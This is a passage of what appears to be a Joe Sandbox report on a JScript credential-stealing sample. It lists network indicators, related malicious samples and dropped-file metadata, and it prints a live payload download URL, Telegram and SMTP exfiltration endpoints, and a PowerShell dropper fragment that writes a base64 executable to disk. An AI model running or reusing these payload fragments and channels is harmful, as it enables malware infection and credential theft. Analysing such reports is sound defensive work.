file 18->47 49 Machine Learning detection for dropped file 18->49 51 Writes to foreign memory regions 18->51 53 2 other signatures 18->53 23 RegAsm.exe 15 2 18->23         started        27 RegAsm.exe 18->27         started        process13 dnsIp14 39 mail24430.maychuemail.com 123.30.244.30, 49736, 587 VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN Viet Nam 23->39 41 checkip.dyndns.com 132.226.247.73, 49731, 80 UTMEMUS United States 23->41 43 reallyfreegeoip.org 104.21.96.1, 443, 49732 CLOUDFLARENETUS United States 23->43 65 Tries to steal Mail credentials (via file / registry access) 23->65 67 Tries to harvest and steal browser information (history, passwords, etc) 23->67 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                1C24TDP_000000029.jse13%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://ocsp.sectigo.com0-0%Avira URL Cloudsafe
                http://mail24430.maychuemail.comd0%Avira URL Cloudsafe
                https://files.catbox.moe;0%Avira URL Cloudsafe
                http://mail.phobinh.com.vn0%Avira URL Cloudsafe
                http://mail24430.maychuemail.com0%Avira URL Cloudsafe
                http://mail.phobinh.com.vnd0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                files.catbox.moe
                108.181.20.35
                truefalse
                  high
                  mail24430.maychuemail.com
                  123.30.244.30
                  truetrue
                    unknown
                    reallyfreegeoip.org
                    104.21.96.1
                    truefalse
                      high
                      checkip.dyndns.com
                      132.226.247.73
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          mail.phobinh.com.vn
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              https://files.catbox.moe/jqxrkk.ps1false
                                high
                                http://checkip.dyndns.org/false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://sectigo.com/CPS0RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com0-RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgdRegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://files.catbox.moe/wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://mail.phobinh.com.vnRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://files.catbox.moe/uwscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://files.catbox.moe;wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://files.catbox.moe/jqxrkk.ps1uwscript.exe, 00000000.00000003.1712270321.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839074641.000001E212B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712341931.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835122772.000001E212B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.comdRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://files.catbox.moe/9wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.org/qx.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://mail24430.maychuemail.comRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://contoso.com/powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://reallyfreegeoip.orgRegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://oneget.orgXpowershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://checkip.dyndns.orgdRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.orgRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://mail24430.maychuemail.comdRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://mail.phobinh.com.vndRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://files.catbox.moewscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://checkip.dyndns.comRegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://checkip.dyndns.org/dRegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.telegram.org/bot-/sendDocument?chat_id=x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://oneget.orgpowershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      108.181.20.35
                                                                                                      files.catbox.moeCanada
                                                                                                      852ASN852CAfalse
                                                                                                      104.21.96.1
                                                                                                      reallyfreegeoip.orgUnited States
                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                      123.30.244.30
                                                                                                      mail24430.maychuemail.comViet Nam
                                                                                                      7643VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVNtrue
                                                                                                      132.226.247.73
                                                                                                      checkip.dyndns.comUnited States
                                                                                                      16989UTMEMUSfalse
                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1586897
                                                                                                      Start date and time:2025-01-09 18:32:13 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 5m 47s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • GSI enabled (Javascript)
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:1C24TDP_000000029.jse
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.spre.troj.spyw.expl.evad.winJSE@10/7@4/4
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 66.7%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 31
                                                                                                      • Number of non-executed functions: 0
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .jse
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 4.245.163.56, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7500 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: 1C24TDP_000000029.jse
                                                                                                      TimeTypeDescription
                                                                                                      12:33:16API Interceptor5x Sleep call for process: powershell.exe modified
                                                                                                      12:33:25API Interceptor81x Sleep call for process: RegAsm.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • files.catbox.moe/p1yr9i.pdf
                                                                                                      SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                                                                      • files.catbox.moe/nzct1p
                                                                                                      104.21.96.1QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.mzkd6gp5.top/3u0p/
                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                      • pelisplus.so/administrator/index.php
                                                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.mffnow.info/1a34/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      reallyfreegeoip.orgTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.16.1
                                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.16.1
                                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.80.1
                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.48.1
                                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.112.1
                                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.112.1
                                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      checkip.dyndns.comTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.130.0
                                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 132.226.8.169
                                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 193.122.6.168
                                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 132.226.247.73
                                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      files.catbox.moec2.htaGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                                                                      • 108.181.20.35
                                                                                                      QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                                                                      • 108.181.20.35
                                                                                                      5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      ASN852CA6.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 66.183.229.9
                                                                                                      sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 161.188.161.80
                                                                                                      sora.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 207.229.42.138
                                                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 50.93.119.87
                                                                                                      c2.htaGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 207.134.206.79
                                                                                                      miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 173.182.249.54
                                                                                                      momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.5.112.131
                                                                                                      z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 50.99.231.33
                                                                                                      sHCznAai4a.batGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      CLOUDFLARENETUS0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 104.21.38.84
                                                                                                      https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 1.1.1.1
                                                                                                      drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      • 172.67.74.152
                                                                                                      Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 1.3.115.13
                                                                                                      https://sora-ai-download.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.22.20.144
                                                                                                      ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.18.11.207
                                                                                                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.5.30
                                                                                                      ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.25.14
                                                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.32.1
                                                                                                      VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVNtelnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.81.0
                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                      • 222.255.236.245
                                                                                                      https://membership.garenaa.id.vn/css/greeting.jsp/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      http://ff.members.gerane.vn/Get hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      http://memberships.garenna.id.vn/css/hitcount.jspGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      file.exeGet hashmaliciousSystemBCBrowse
                                                                                                      • 222.255.235.113
                                                                                                      Ng11aTxsp8.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                      • 123.30.128.169
                                                                                                      52fkd1Rd8E.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 203.162.81.4
                                                                                                      UQqIEFBoFN.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 203.162.81.9
                                                                                                      DNTT-v3.1.xlsb.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 222.255.103.91
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.96.1
                                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      37f463bf4616ecd445d4a1937da06e19drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                                      • 108.181.20.35
                                                                                                      http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):186488
                                                                                                      Entropy (8bit):5.916802219473977
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:NlbgeXDOEpoKxKjtT0eIfGUQteCmpqLtSX9bun6CPh+G6K45I:/bg6BKdtTfIfGZ4rpGsNbuL+xa
                                                                                                      MD5:32DA6EE3B90B2D2F694B8635DFA58459
                                                                                                      SHA1:9272EE959D8290D6F4095FD6525C7927B5C92DE0
                                                                                                      SHA-256:00A6CD51B0D8CA285EEA43383A0736A9C4B95ED381FB5607291D08DC9870E30F
                                                                                                      SHA-512:BE827EEB5CB31C5126696577A54D52E26391EC843D36CBAB5C369C908ECA52115192DB73825C0FCEEFEABE5FE98B823545451CB7B6859998AF4325DA0CD1C173
                                                                                                      Malicious:true
                                                                                                      Reputation:low
                                                                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFALfgd6EAAAAAAAAAAOAAIgALATAAAH4AAACgAQAAAAAACmACAADAAQAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAgAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANTFAQBXAAAAAEACAJYFAAAAAAAAAAAAAAAAAAAAAAAAAIACAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAIACAAAAAAAAAAAAAAAAMABAEgAAAAAAAAAAAAAABw2RmQ6YyMRRJcBAAAgAAAAmAEAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAAAx7AAAAwAEAAHwAAACcAQAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACWBQAAAEACAAAGAAAAGAIAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAABgAgAAAgAAAB4CAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAIAAAIAAAAgAgAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                      File Type:CSV text
